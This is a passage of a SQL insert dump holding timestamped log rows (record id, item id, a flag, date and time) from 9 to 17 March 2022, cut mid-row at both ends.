21:30:27'),(46900,1586,1,'2022-03-09','2022-03-09 21:52:11'),(46901,1600,1,'2022-03-09','2022-03-09 22:21:52'),(46902,1594,1,'2022-03-09','2022-03-09 22:42:47'),(46903,3721,1,'2022-03-09','2022-03-09 23:00:05'),(46904,1602,1,'2022-03-09','2022-03-09 23:03:18'),(46905,3069,1,'2022-03-09','2022-03-09 23:13:57'),(46906,1612,1,'2022-03-09','2022-03-09 23:58:26'),(46907,1544,1,'2022-03-10','2022-03-10 00:26:42'),(46908,1602,1,'2022-03-10','2022-03-10 00:27:34'),(46909,1594,1,'2022-03-10','2022-03-10 00:29:35'),(46910,1544,1,'2022-03-10','2022-03-10 00:29:48'),(46911,1600,1,'2022-03-10','2022-03-10 01:30:00'),(46912,4566,1,'2022-03-10','2022-03-10 02:59:36'),(46913,1600,1,'2022-03-10','2022-03-10 03:19:00'),(46914,1872,1,'2022-03-10','2022-03-10 03:19:14'),(46915,4566,1,'2022-03-10','2022-03-10 03:57:23'),(46916,1602,1,'2022-03-10','2022-03-10 04:19:05'),(46917,4416,1,'2022-03-10','2022-03-10 04:53:16'),(46918,1608,1,'2022-03-10','2022-03-10 05:01:19'),(46919,2297,1,'2022-03-10','2022-03-10 05:01:42'),(46920,1606,1,'2022-03-10','2022-03-10 05:16:48'),(46921,3102,1,'2022-03-10','2022-03-10 05:27:57'),(46922,473,1,'2022-03-10','2022-03-10 05:31:17'),(46923,3041,1,'2022-03-10','2022-03-10 05:31:24'),(46924,2704,1,'2022-03-10','2022-03-10 05:42:30'),(46925,2150,1,'2022-03-10','2022-03-10 06:12:44'),(46926,4428,1,'2022-03-10','2022-03-10 06:31:58'),(46927,72,1,'2022-03-10','2022-03-10 08:58:51'),(46928,4551,1,'2022-03-10','2022-03-10 09:43:47'),(46929,4391,1,'2022-03-10','2022-03-10 09:59:40'),(46930,1602,1,'2022-03-10','2022-03-10 10:08:20'),(46931,1602,1,'2022-03-10','2022-03-10 10:10:48'),(46932,1604,1,'2022-03-10','2022-03-10 10:11:20'),(46933,80,1,'2022-03-10','2022-03-10 10:11:53'),(46934,1602,1,'2022-03-10','2022-03-10 10:12:47'),(46935,1604,1,'2022-03-10','2022-03-10 10:13:24'),(46936,76,1,'2022-03-10','2022-03-10 10:13:31'),(46937,89,1,'2022-03-10','2022-03-10 10:20:13'),(46938,87,1,'2022-03-10','2022-03-10 10:20:47'),(46939,89,1,'2022-03-10','2022-03-10 10:21:57'),(46940,1544,1,'2022-03-10','2022-03-10 10:23:45'),(46941,1586,1,'2022-03-10','2022-03-10 10:59:40'),(46942,3691,1,'2022-03-10','2022-03-10 11:05:27'),(46943,1594,1,'2022-03-10','2022-03-10 11:08:21'),(46944,1544,1,'2022-03-10','2022-03-10 11:08:33'),(46945,1544,1,'2022-03-10','2022-03-10 11:08:42'),(46946,1606,1,'2022-03-10','2022-03-10 11:23:35'),(46947,1604,1,'2022-03-10','2022-03-10 11:25:24'),(46948,3251,1,'2022-03-10','2022-03-10 11:33:59'),(46949,3691,1,'2022-03-10','2022-03-10 11:34:34'),(46950,1586,1,'2022-03-10','2022-03-10 11:43:35'),(46951,3069,1,'2022-03-10','2022-03-10 11:53:47'),(46952,1600,1,'2022-03-10','2022-03-10 11:59:14'),(46953,1872,1,'2022-03-10','2022-03-10 12:10:22'),(46954,1872,1,'2022-03-10','2022-03-10 12:27:39'),(46955,4524,1,'2022-03-10','2022-03-10 12:28:28'),(46956,4524,1,'2022-03-10','2022-03-10 12:42:28'),(46957,1606,1,'2022-03-10','2022-03-10 12:45:36'),(46958,4566,1,'2022-03-10','2022-03-10 12:51:19'),(46959,1600,1,'2022-03-10','2022-03-10 13:42:59'),(46960,4420,1,'2022-03-10','2022-03-10 13:45:16'),(46961,1608,1,'2022-03-10','2022-03-10 13:46:44'),(46962,2609,1,'2022-03-10','2022-03-10 14:03:00'),(46963,1588,1,'2022-03-10','2022-03-10 14:03:29'),(46964,2609,1,'2022-03-10','2022-03-10 14:04:12'),(46965,2609,1,'2022-03-10','2022-03-10 14:05:02'),(46966,2609,1,'2022-03-10','2022-03-10 14:05:22'),(46967,3698,1,'2022-03-10','2022-03-10 14:47:00'),(46968,4416,1,'2022-03-10','2022-03-10 14:49:12'),(46969,1728,1,'2022-03-10','2022-03-10 15:09:23'),(46970,4416,1,'2022-03-10','2022-03-10 15:16:31'),(46971,4566,1,'2022-03-10','2022-03-10 15:19:32'),(46972,68,1,'2022-03-10','2022-03-10 15:39:17'),(46973,68,1,'2022-03-10','2022-03-10 15:47:16'),(46974,3030,1,'2022-03-10','2022-03-10 16:31:26'),(46975,3030,1,'2022-03-10','2022-03-10 16:42:17'),(46976,3240,1,'2022-03-10','2022-03-10 16:47:29'),(46977,3251,1,'2022-03-10','2022-03-10 16:47:35'),(46978,478,1,'2022-03-10','2022-03-10 16:52:06'),(46979,2609,1,'2022-03-10','2022-03-10 17:11:12'),(46980,80,1,'2022-03-10','2022-03-10 17:44:31'),(46981,80,1,'2022-03-10','2022-03-10 17:45:44'),(46982,2309,1,'2022-03-10','2022-03-10 18:02:51'),(46983,1598,1,'2022-03-10','2022-03-10 18:04:08'),(46984,1877,1,'2022-03-10','2022-03-10 18:33:56'),(46985,2309,1,'2022-03-10','2022-03-10 21:19:00'),(46986,3175,1,'2022-03-10','2022-03-10 21:29:37'),(46987,80,1,'2022-03-10','2022-03-10 23:11:03'),(46988,4514,1,'2022-03-10','2022-03-10 23:31:26'),(46989,3698,1,'2022-03-10','2022-03-10 23:33:37'),(46990,3316,1,'2022-03-10','2022-03-10 23:59:50'),(46991,2248,1,'2022-03-11','2022-03-11 00:00:08'),(46992,72,1,'2022-03-11','2022-03-11 00:02:51'),(46993,4416,1,'2022-03-11','2022-03-11 00:03:38'),(46994,4582,1,'2022-03-11','2022-03-11 00:12:18'),(46995,1598,1,'2022-03-11','2022-03-11 00:13:11'),(46996,1594,1,'2022-03-11','2022-03-11 00:27:05'),(46997,1608,1,'2022-03-11','2022-03-11 00:33:46'),(46998,3069,1,'2022-03-11','2022-03-11 00:40:29'),(46999,3226,1,'2022-03-11','2022-03-11 01:00:22'),(47000,3041,1,'2022-03-11','2022-03-11 01:05:54'),(47001,3006,1,'2022-03-11','2022-03-11 01:07:51'),(47002,2813,1,'2022-03-11','2022-03-11 01:10:41'),(47003,4529,1,'2022-03-11','2022-03-11 01:26:16'),(47004,3316,1,'2022-03-11','2022-03-11 01:40:37'),(47005,1586,1,'2022-03-11','2022-03-11 01:41:29'),(47006,1598,1,'2022-03-11','2022-03-11 02:11:56'),(47007,1600,1,'2022-03-11','2022-03-11 02:26:41'),(47008,3006,1,'2022-03-11','2022-03-11 02:40:46'),(47009,478,1,'2022-03-11','2022-03-11 02:46:24'),(47010,4514,1,'2022-03-11','2022-03-11 02:58:08'),(47011,1751,1,'2022-03-11','2022-03-11 05:39:25'),(47012,4566,1,'2022-03-11','2022-03-11 06:25:17'),(47013,1544,1,'2022-03-11','2022-03-11 06:34:06'),(47014,1544,1,'2022-03-11','2022-03-11 06:34:06'),(47015,1544,1,'2022-03-11','2022-03-11 06:34:07'),(47016,3774,1,'2022-03-11','2022-03-11 06:46:13'),(47017,2457,1,'2022-03-11','2022-03-11 07:36:49'),(47018,1544,1,'2022-03-11','2022-03-11 07:51:22'),(47019,3271,1,'2022-03-11','2022-03-11 07:56:11'),(47020,2411,1,'2022-03-11','2022-03-11 08:00:38'),(47021,1544,1,'2022-03-11','2022-03-11 08:09:32'),(47022,1544,1,'2022-03-11','2022-03-11 08:09:39'),(47023,4457,1,'2022-03-11','2022-03-11 08:53:48'),(47024,72,1,'2022-03-11','2022-03-11 09:05:16'),(47025,1596,1,'2022-03-11','2022-03-11 09:05:28'),(47026,1596,1,'2022-03-11','2022-03-11 09:08:21'),(47027,3777,1,'2022-03-11','2022-03-11 10:06:52'),(47028,4416,1,'2022-03-11','2022-03-11 10:24:01'),(47029,3240,1,'2022-03-11','2022-03-11 10:37:03'),(47030,3251,1,'2022-03-11','2022-03-11 11:19:24'),(47031,1728,1,'2022-03-11','2022-03-11 11:29:34'),(47032,1728,1,'2022-03-11','2022-03-11 11:29:50'),(47033,1728,1,'2022-03-11','2022-03-11 11:30:17'),(47034,1728,1,'2022-03-11','2022-03-11 11:30:23'),(47035,1728,1,'2022-03-11','2022-03-11 11:31:53'),(47036,1728,1,'2022-03-11','2022-03-11 11:32:21'),(47037,1728,1,'2022-03-11','2022-03-11 11:32:25'),(47038,1728,1,'2022-03-11','2022-03-11 11:32:26'),(47039,1728,1,'2022-03-11','2022-03-11 11:32:28'),(47040,1728,1,'2022-03-11','2022-03-11 11:32:29'),(47041,1612,1,'2022-03-11','2022-03-11 11:34:22'),(47042,2309,1,'2022-03-11','2022-03-11 11:36:54'),(47043,3263,1,'2022-03-11','2022-03-11 11:47:49'),(47044,4498,1,'2022-03-11','2022-03-11 11:56:36'),(47045,3030,1,'2022-03-11','2022-03-11 12:05:58'),(47046,1598,1,'2022-03-11','2022-03-11 12:13:52'),(47047,3263,1,'2022-03-11','2022-03-11 12:19:31'),(47048,2309,1,'2022-03-11','2022-03-11 12:36:55'),(47049,1602,1,'2022-03-11','2022-03-11 12:52:22'),(47050,487,1,'2022-03-11','2022-03-11 12:55:36'),(47051,3107,1,'2022-03-11','2022-03-11 13:04:48'),(47052,3251,1,'2022-03-11','2022-03-11 13:15:30'),(47053,4520,1,'2022-03-11','2022-03-11 13:16:32'),(47054,3251,1,'2022-03-11','2022-03-11 13:18:01'),(47055,1872,1,'2022-03-11','2022-03-11 13:23:03'),(47056,3251,1,'2022-03-11','2022-03-11 13:29:21'),(47057,1612,1,'2022-03-11','2022-03-11 13:49:16'),(47058,3251,1,'2022-03-11','2022-03-11 14:15:37'),(47059,3251,1,'2022-03-11','2022-03-11 14:34:57'),(47060,1602,1,'2022-03-11','2022-03-11 15:58:16'),(47061,108,1,'2022-03-11','2022-03-11 18:05:35'),(47062,3030,1,'2022-03-11','2022-03-11 18:40:48'),(47063,108,1,'2022-03-11','2022-03-11 19:07:15'),(47064,3004,1,'2022-03-11','2022-03-11 19:14:05'),(47065,3004,1,'2022-03-11','2022-03-11 19:16:27'),(47066,3030,1,'2022-03-11','2022-03-11 19:26:25'),(47067,4444,1,'2022-03-11','2022-03-11 19:29:33'),(47068,3030,1,'2022-03-11','2022-03-11 19:30:09'),(47069,3030,1,'2022-03-11','2022-03-11 19:31:03'),(47070,4238,1,'2022-03-11','2022-03-11 19:47:39'),(47071,3004,1,'2022-03-11','2022-03-11 19:55:19'),(47072,3004,1,'2022-03-11','2022-03-11 19:55:31'),(47073,3004,1,'2022-03-11','2022-03-11 19:57:23'),(47074,3030,1,'2022-03-11','2022-03-11 20:00:44'),(47075,3030,1,'2022-03-11','2022-03-11 20:00:50'),(47076,486,1,'2022-03-11','2022-03-11 20:01:13'),(47077,4412,1,'2022-03-11','2022-03-11 20:07:17'),(47078,4448,1,'2022-03-11','2022-03-11 21:49:52'),(47079,4529,1,'2022-03-11','2022-03-11 23:16:48'),(47080,1600,1,'2022-03-11','2022-03-11 23:29:18'),(47081,2309,1,'2022-03-11','2022-03-11 23:47:06'),(47082,1877,1,'2022-03-12','2022-03-12 00:14:30'),(47083,1600,1,'2022-03-12','2022-03-12 00:32:27'),(47084,72,1,'2022-03-12','2022-03-12 00:36:31'),(47085,80,1,'2022-03-12','2022-03-12 03:02:48'),(47086,474,1,'2022-03-12','2022-03-12 05:14:53'),(47087,4498,1,'2022-03-12','2022-03-12 06:12:46'),(47088,2558,1,'2022-03-12','2022-03-12 07:34:35'),(47089,1586,1,'2022-03-12','2022-03-12 08:09:19'),(47090,1782,1,'2022-03-12','2022-03-12 08:23:48'),(47091,1600,1,'2022-03-12','2022-03-12 09:10:19'),(47092,3251,1,'2022-03-12','2022-03-12 09:19:34'),(47093,3251,1,'2022-03-12','2022-03-12 09:24:02'),(47094,3251,1,'2022-03-12','2022-03-12 09:26:25'),(47095,3226,1,'2022-03-12','2022-03-12 09:48:24'),(47096,1602,1,'2022-03-12','2022-03-12 10:00:37'),(47097,3251,1,'2022-03-12','2022-03-12 10:01:02'),(47098,3251,1,'2022-03-12','2022-03-12 10:01:02'),(47099,3251,1,'2022-03-12','2022-03-12 10:01:10'),(47100,3251,1,'2022-03-12','2022-03-12 10:02:46'),(47101,2904,1,'2022-03-12','2022-03-12 10:03:13'),(47102,2904,1,'2022-03-12','2022-03-12 10:03:14'),(47103,2904,1,'2022-03-12','2022-03-12 10:03:38'),(47104,2904,1,'2022-03-12','2022-03-12 10:05:09'),(47105,2904,1,'2022-03-12','2022-03-12 10:05:09'),(47106,87,1,'2022-03-12','2022-03-12 10:05:48'),(47107,87,1,'2022-03-12','2022-03-12 10:05:52'),(47108,1600,1,'2022-03-12','2022-03-12 10:31:02'),(47109,570,1,'2022-03-12','2022-03-12 10:59:59'),(47110,4566,1,'2022-03-12','2022-03-12 11:32:33'),(47111,1598,1,'2022-03-12','2022-03-12 12:01:15'),(47112,570,1,'2022-03-12','2022-03-12 12:16:44'),(47113,570,1,'2022-03-12','2022-03-12 12:21:17'),(47114,1602,1,'2022-03-12','2022-03-12 12:32:18'),(47115,3251,1,'2022-03-12','2022-03-12 12:34:32'),(47116,3251,1,'2022-03-12','2022-03-12 12:34:33'),(47117,1720,1,'2022-03-12','2022-03-12 12:49:27'),(47118,4566,1,'2022-03-12','2022-03-12 13:00:26'),(47119,3251,1,'2022-03-12','2022-03-12 13:37:02'),(47120,3251,1,'2022-03-12','2022-03-12 13:37:04'),(47121,1600,1,'2022-03-12','2022-03-12 13:40:08'),(47122,87,1,'2022-03-12','2022-03-12 13:47:10'),(47123,2904,1,'2022-03-12','2022-03-12 13:47:11'),(47124,2904,1,'2022-03-12','2022-03-12 13:47:12'),(47125,87,1,'2022-03-12','2022-03-12 13:47:12'),(47126,87,1,'2022-03-12','2022-03-12 13:47:13'),(47127,2904,1,'2022-03-12','2022-03-12 13:47:14'),(47128,2904,1,'2022-03-12','2022-03-12 13:47:18'),(47129,2904,1,'2022-03-12','2022-03-12 13:47:19'),(47130,3251,1,'2022-03-12','2022-03-12 13:47:21'),(47131,1586,1,'2022-03-12','2022-03-12 13:55:08'),(47132,1586,1,'2022-03-12','2022-03-12 13:57:30'),(47133,1614,1,'2022-03-12','2022-03-12 15:09:07'),(47134,3083,1,'2022-03-12','2022-03-12 17:26:08'),(47135,4457,1,'2022-03-12','2022-03-12 17:42:18'),(47136,1612,1,'2022-03-12','2022-03-12 18:30:12'),(47137,1598,1,'2022-03-12','2022-03-12 18:39:30'),(47138,4457,1,'2022-03-12','2022-03-12 19:04:19'),(47139,3030,1,'2022-03-12','2022-03-12 19:05:01'),(47140,3069,1,'2022-03-12','2022-03-12 20:08:02'),(47141,108,1,'2022-03-12','2022-03-12 20:29:13'),(47142,3534,1,'2022-03-12','2022-03-12 21:58:18'),(47143,4582,1,'2022-03-12','2022-03-12 21:58:23'),(47144,72,1,'2022-03-12','2022-03-12 22:06:03'),(47145,1598,1,'2022-03-12','2022-03-12 22:26:05'),(47146,1600,1,'2022-03-12','2022-03-12 22:40:03'),(47147,1588,1,'2022-03-12','2022-03-12 22:54:14'),(47148,1877,1,'2022-03-12','2022-03-12 23:07:43'),(47149,1606,1,'2022-03-12','2022-03-12 23:48:05'),(47150,1588,1,'2022-03-13','2022-03-13 00:13:05'),(47151,1600,1,'2022-03-13','2022-03-13 00:44:31'),(47152,1606,1,'2022-03-13','2022-03-13 01:01:11'),(47153,1606,1,'2022-03-13','2022-03-13 01:01:55'),(47154,3269,1,'2022-03-13','2022-03-13 01:15:58'),(47155,1594,1,'2022-03-13','2022-03-13 01:24:34'),(47156,1598,1,'2022-03-13','2022-03-13 01:29:58'),(47157,3251,1,'2022-03-13','2022-03-13 07:47:42'),(47158,3251,1,'2022-03-13','2022-03-13 07:48:19'),(47159,3251,1,'2022-03-13','2022-03-13 07:48:40'),(47160,3251,1,'2022-03-13','2022-03-13 07:48:56'),(47161,68,1,'2022-03-13','2022-03-13 07:49:41'),(47162,335,1,'2022-03-13','2022-03-13 07:52:12'),(47163,3030,1,'2022-03-13','2022-03-13 07:52:42'),(47164,68,1,'2022-03-13','2022-03-13 07:53:07'),(47165,3251,1,'2022-03-13','2022-03-13 07:53:11'),(47166,68,1,'2022-03-13','2022-03-13 08:51:27'),(47167,335,1,'2022-03-13','2022-03-13 10:27:42'),(47168,1586,1,'2022-03-13','2022-03-13 10:43:19'),(47169,1877,1,'2022-03-13','2022-03-13 10:45:28'),(47170,1588,1,'2022-03-13','2022-03-13 10:58:57'),(47171,4529,1,'2022-03-13','2022-03-13 11:13:19'),(47172,1598,1,'2022-03-13','2022-03-13 11:28:18'),(47173,1598,1,'2022-03-13','2022-03-13 11:29:24'),(47174,1586,1,'2022-03-13','2022-03-13 11:35:28'),(47175,4582,1,'2022-03-13','2022-03-13 12:01:11'),(47176,3269,1,'2022-03-13','2022-03-13 12:28:30'),(47177,3030,1,'2022-03-13','2022-03-13 13:56:13'),(47178,1722,1,'2022-03-13','2022-03-13 15:34:03'),(47179,1602,1,'2022-03-13','2022-03-13 16:34:02'),(47180,87,1,'2022-03-13','2022-03-13 17:37:35'),(47181,68,1,'2022-03-13','2022-03-13 19:00:46'),(47182,68,1,'2022-03-13','2022-03-13 19:52:41'),(47183,1598,1,'2022-03-13','2022-03-13 20:14:45'),(47184,1598,1,'2022-03-13','2022-03-13 20:14:51'),(47185,1600,1,'2022-03-13','2022-03-13 21:31:09'),(47186,3486,1,'2022-03-13','2022-03-13 22:12:33'),(47187,4444,1,'2022-03-13','2022-03-13 22:14:51'),(47188,1602,1,'2022-03-13','2022-03-13 22:45:02'),(47189,1877,1,'2022-03-13','2022-03-13 22:48:12'),(47190,1600,1,'2022-03-13','2022-03-13 23:15:39'),(47191,3486,1,'2022-03-13','2022-03-13 23:17:08'),(47192,4582,1,'2022-03-13','2022-03-13 23:52:20'),(47193,4582,1,'2022-03-14','2022-03-14 02:02:12'),(47194,1606,1,'2022-03-14','2022-03-14 02:31:07'),(47195,2904,1,'2022-03-14','2022-03-14 02:43:38'),(47196,1594,1,'2022-03-14','2022-03-14 03:02:19'),(47197,1588,1,'2022-03-14','2022-03-14 03:25:24'),(47198,1588,1,'2022-03-14','2022-03-14 03:31:46'),(47199,1600,1,'2022-03-14','2022-03-14 03:47:06'),(47200,72,1,'2022-03-14','2022-03-14 04:22:30'),(47201,1588,1,'2022-03-14','2022-03-14 04:24:44'),(47202,1724,1,'2022-03-14','2022-03-14 05:46:21'),(47203,1588,1,'2022-03-14','2022-03-14 06:05:16'),(47204,80,1,'2022-03-14','2022-03-14 06:18:22'),(47205,87,1,'2022-03-14','2022-03-14 06:19:22'),(47206,4335,1,'2022-03-14','2022-03-14 06:55:59'),(47207,72,1,'2022-03-14','2022-03-14 07:00:52'),(47208,1614,1,'2022-03-14','2022-03-14 08:23:32'),(47209,80,1,'2022-03-14','2022-03-14 08:40:34'),(47210,2809,1,'2022-03-14','2022-03-14 09:27:38'),(47211,1582,1,'2022-03-14','2022-03-14 09:43:27'),(47212,1586,1,'2022-03-14','2022-03-14 09:59:12'),(47213,1612,1,'2022-03-14','2022-03-14 10:20:49'),(47214,1604,1,'2022-03-14','2022-03-14 10:21:05'),(47215,1582,1,'2022-03-14','2022-03-14 10:43:56'),(47216,1718,1,'2022-03-14','2022-03-14 11:36:34'),(47217,2769,1,'2022-03-14','2022-03-14 11:51:53'),(47218,1606,1,'2022-03-14','2022-03-14 11:55:38'),(47219,72,1,'2022-03-14','2022-03-14 12:20:26'),(47220,2457,1,'2022-03-14','2022-03-14 12:21:45'),(47221,2971,1,'2022-03-14','2022-03-14 12:34:12'),(47222,1600,1,'2022-03-14','2022-03-14 12:44:51'),(47223,2457,1,'2022-03-14','2022-03-14 12:50:45'),(47224,2801,1,'2022-03-14','2022-03-14 12:52:25'),(47225,3069,1,'2022-03-14','2022-03-14 13:08:42'),(47226,1877,1,'2022-03-14','2022-03-14 13:15:07'),(47227,1612,1,'2022-03-14','2022-03-14 13:32:42'),(47228,2769,1,'2022-03-14','2022-03-14 14:44:48'),(47229,1608,1,'2022-03-14','2022-03-14 14:47:45'),(47230,4551,1,'2022-03-14','2022-03-14 14:50:33'),(47231,3282,1,'2022-03-14','2022-03-14 19:13:17'),(47232,3282,1,'2022-03-14','2022-03-14 19:13:30'),(47233,3282,1,'2022-03-14','2022-03-14 19:13:42'),(47234,72,1,'2022-03-14','2022-03-14 20:01:20'),(47235,1606,1,'2022-03-14','2022-03-14 20:05:14'),(47236,1604,1,'2022-03-14','2022-03-14 22:53:57'),(47237,2297,1,'2022-03-14','2022-03-14 22:56:21'),(47238,3069,1,'2022-03-14','2022-03-14 23:31:12'),(47239,4514,1,'2022-03-15','2022-03-15 00:01:18'),(47240,4323,1,'2022-03-15','2022-03-15 00:16:05'),(47241,4517,1,'2022-03-15','2022-03-15 02:01:12'),(47242,1604,1,'2022-03-15','2022-03-15 03:01:14'),(47243,72,1,'2022-03-15','2022-03-15 05:08:27'),(47244,68,1,'2022-03-15','2022-03-15 06:02:56'),(47245,89,1,'2022-03-15','2022-03-15 06:06:36'),(47246,1544,1,'2022-03-15','2022-03-15 08:09:32'),(47247,1544,1,'2022-03-15','2022-03-15 08:09:36'),(47248,1544,1,'2022-03-15','2022-03-15 08:09:41'),(47249,1544,1,'2022-03-15','2022-03-15 10:39:33'),(47250,3280,1,'2022-03-15','2022-03-15 10:45:37'),(47251,4520,1,'2022-03-15','2022-03-15 10:45:45'),(47252,1544,1,'2022-03-15','2022-03-15 10:53:42'),(47253,4520,1,'2022-03-15','2022-03-15 10:54:38'),(47254,2904,1,'2022-03-15','2022-03-15 10:58:07'),(47255,2904,1,'2022-03-15','2022-03-15 10:59:11'),(47256,68,1,'2022-03-15','2022-03-15 11:04:35'),(47257,4335,1,'2022-03-15','2022-03-15 11:06:58'),(47258,1600,1,'2022-03-15','2022-03-15 11:21:11'),(47259,89,1,'2022-03-15','2022-03-15 11:32:54'),(47260,1600,1,'2022-03-15','2022-03-15 11:34:06'),(47261,72,1,'2022-03-15','2022-03-15 11:39:20'),(47262,2503,1,'2022-03-15','2022-03-15 11:40:58'),(47263,76,1,'2022-03-15','2022-03-15 11:42:09'),(47264,91,1,'2022-03-15','2022-03-15 11:44:38'),(47265,4520,1,'2022-03-15','2022-03-15 12:04:05'),(47266,1606,1,'2022-03-15','2022-03-15 12:11:53'),(47267,4520,1,'2022-03-15','2022-03-15 12:13:47'),(47268,1877,1,'2022-03-15','2022-03-15 12:27:14'),(47269,4520,1,'2022-03-15','2022-03-15 12:32:12'),(47270,1598,1,'2022-03-15','2022-03-15 12:36:35'),(47271,3226,1,'2022-03-15','2022-03-15 12:41:55'),(47272,1544,1,'2022-03-15','2022-03-15 12:42:08'),(47273,3226,1,'2022-03-15','2022-03-15 12:46:36'),(47274,3226,1,'2022-03-15','2022-03-15 12:48:34'),(47275,1586,1,'2022-03-15','2022-03-15 13:06:15'),(47276,2904,1,'2022-03-15','2022-03-15 13:13:52'),(47277,68,1,'2022-03-15','2022-03-15 13:14:51'),(47278,4514,1,'2022-03-15','2022-03-15 13:18:31'),(47279,4514,1,'2022-03-15','2022-03-15 13:31:26'),(47280,4520,1,'2022-03-15','2022-03-15 13:38:29'),(47281,3482,1,'2022-03-15','2022-03-15 15:06:27'),(47282,2309,1,'2022-03-15','2022-03-15 15:20:48'),(47283,4457,1,'2022-03-15','2022-03-15 16:01:25'),(47284,468,1,'2022-03-15','2022-03-15 16:14:59'),(47285,1600,1,'2022-03-15','2022-03-15 16:16:38'),(47286,1711,1,'2022-03-15','2022-03-15 17:35:53'),(47287,1711,1,'2022-03-15','2022-03-15 17:38:03'),(47288,72,1,'2022-03-15','2022-03-15 18:01:52'),(47289,4542,1,'2022-03-15','2022-03-15 18:34:48'),(47290,3124,1,'2022-03-15','2022-03-15 18:45:56'),(47291,4457,1,'2022-03-15','2022-03-15 18:54:38'),(47292,2609,1,'2022-03-15','2022-03-15 19:16:01'),(47293,4416,1,'2022-03-15','2022-03-15 19:26:09'),(47294,468,1,'2022-03-15','2022-03-15 19:33:22'),(47295,486,1,'2022-03-15','2022-03-15 19:51:34'),(47296,84,1,'2022-03-15','2022-03-15 19:54:48'),(47297,3674,1,'2022-03-15','2022-03-15 20:00:01'),(47298,4520,1,'2022-03-15','2022-03-15 20:18:29'),(47299,2769,1,'2022-03-15','2022-03-15 20:57:03'),(47300,1544,1,'2022-03-15','2022-03-15 21:49:28'),(47301,3030,1,'2022-03-15','2022-03-15 22:01:55'),(47302,3030,1,'2022-03-15','2022-03-15 22:01:58'),(47303,72,1,'2022-03-15','2022-03-15 22:47:16'),(47304,3004,1,'2022-03-15','2022-03-15 22:55:08'),(47305,1582,1,'2022-03-16','2022-03-16 00:15:53'),(47306,1877,1,'2022-03-16','2022-03-16 00:36:17'),(47307,3278,1,'2022-03-16','2022-03-16 00:40:16'),(47308,1720,1,'2022-03-16','2022-03-16 00:46:57'),(47309,4338,1,'2022-03-16','2022-03-16 01:01:57'),(47310,4529,1,'2022-03-16','2022-03-16 01:06:58'),(47311,468,1,'2022-03-16','2022-03-16 01:19:52'),(47312,4566,1,'2022-03-16','2022-03-16 01:30:11'),(47313,4524,1,'2022-03-16','2022-03-16 03:06:07'),(47314,2801,1,'2022-03-16','2022-03-16 03:42:43'),(47315,3724,1,'2022-03-16','2022-03-16 07:19:01'),(47316,2159,1,'2022-03-16','2022-03-16 08:31:46'),(47317,2159,1,'2022-03-16','2022-03-16 08:39:09'),(47318,4520,1,'2022-03-16','2022-03-16 09:16:22'),(47319,1586,1,'2022-03-16','2022-03-16 09:19:00'),(47320,3030,1,'2022-03-16','2022-03-16 09:19:59'),(47321,91,1,'2022-03-16','2022-03-16 09:27:10'),(47322,3313,1,'2022-03-16','2022-03-16 10:11:56'),(47323,1598,1,'2022-03-16','2022-03-16 10:40:50'),(47324,1602,1,'2022-03-16','2022-03-16 10:51:40'),(47325,3313,1,'2022-03-16','2022-03-16 10:51:58'),(47326,3307,1,'2022-03-16','2022-03-16 10:52:46'),(47327,3307,1,'2022-03-16','2022-03-16 10:52:48'),(47328,1590,1,'2022-03-16','2022-03-16 11:02:41'),(47329,3724,1,'2022-03-16','2022-03-16 11:17:46'),(47330,1544,1,'2022-03-16','2022-03-16 11:31:39'),(47331,4524,1,'2022-03-16','2022-03-16 12:08:55'),(47332,3069,1,'2022-03-16','2022-03-16 12:25:24'),(47333,4517,1,'2022-03-16','2022-03-16 12:31:11'),(47334,3307,1,'2022-03-16','2022-03-16 12:42:41'),(47335,1600,1,'2022-03-16','2022-03-16 12:53:31'),(47336,1724,1,'2022-03-16','2022-03-16 12:53:37'),(47337,1724,1,'2022-03-16','2022-03-16 12:53:59'),(47338,91,1,'2022-03-16','2022-03-16 12:54:10'),(47339,4542,1,'2022-03-16','2022-03-16 12:56:35'),(47340,4542,1,'2022-03-16','2022-03-16 12:56:37'),(47341,1600,1,'2022-03-16','2022-03-16 12:57:52'),(47342,1598,1,'2022-03-16','2022-03-16 13:12:41'),(47343,4529,1,'2022-03-16','2022-03-16 13:28:32'),(47344,4529,1,'2022-03-16','2022-03-16 13:29:44'),(47345,1582,1,'2022-03-16','2022-03-16 13:55:22'),(47346,89,1,'2022-03-16','2022-03-16 14:13:29'),(47347,91,1,'2022-03-16','2022-03-16 14:14:08'),(47348,89,1,'2022-03-16','2022-03-16 14:15:02'),(47349,76,1,'2022-03-16','2022-03-16 14:15:10'),(47350,2503,1,'2022-03-16','2022-03-16 14:15:24'),(47351,2503,1,'2022-03-16','2022-03-16 14:15:43'),(47352,2503,1,'2022-03-16','2022-03-16 14:15:49'),(47353,1544,1,'2022-03-16','2022-03-16 14:41:45'),(47354,1544,1,'2022-03-16','2022-03-16 14:42:20'),(47355,1594,1,'2022-03-16','2022-03-16 14:44:50'),(47356,1544,1,'2022-03-16','2022-03-16 14:48:45'),(47357,4238,1,'2022-03-16','2022-03-16 14:50:37'),(47358,1594,1,'2022-03-16','2022-03-16 15:09:32'),(47359,76,1,'2022-03-16','2022-03-16 15:12:36'),(47360,1594,1,'2022-03-16','2022-03-16 16:50:01'),(47361,1600,1,'2022-03-16','2022-03-16 17:52:06'),(47362,3102,1,'2022-03-16','2022-03-16 18:20:57'),(47363,468,1,'2022-03-16','2022-03-16 19:17:12'),(47364,3030,1,'2022-03-16','2022-03-16 19:43:22'),(47365,1612,1,'2022-03-16','2022-03-16 19:54:53'),(47366,4514,1,'2022-03-16','2022-03-16 20:48:04'),(47367,4520,1,'2022-03-16','2022-03-16 21:17:52'),(47368,3285,1,'2022-03-16','2022-03-16 22:06:33'),(47369,3285,1,'2022-03-16','2022-03-16 22:06:58'),(47370,1778,1,'2022-03-16','2022-03-16 22:55:08'),(47371,1778,1,'2022-03-16','2022-03-16 22:55:22'),(47372,1778,1,'2022-03-16','2022-03-16 22:56:09'),(47373,72,1,'2022-03-16','2022-03-16 23:21:12'),(47374,479,1,'2022-03-16','2022-03-16 23:50:32'),(47375,2297,1,'2022-03-17','2022-03-17 00:10:35'),(47376,1604,1,'2022-03-17','2022-03-17 00:30:33'),(47377,2658,1,'2022-03-17','2022-03-17 00:36:33'),(47378,1598,1,'2022-03-17','2022-03-17 00:49:56'),(47379,3285,1,'2022-03-17','2022-03-17 00:50:15'),(47380,1544,1,'2022-03-17','2022-03-17 01:00:14'),(47381,2297,1,'2022-03-17','2022-03-17 01:10:08'),(47382,1600,1,'2022-03-17','2022-03-17 01:14:43'),(47383,473,1,'2022-03-17','2022-03-17 01:44:44'),(47384,1602,1,'2022-03-17','2022-03-17 01:51:53'),(47385,3287,1,'2022-03-17','2022-03-17 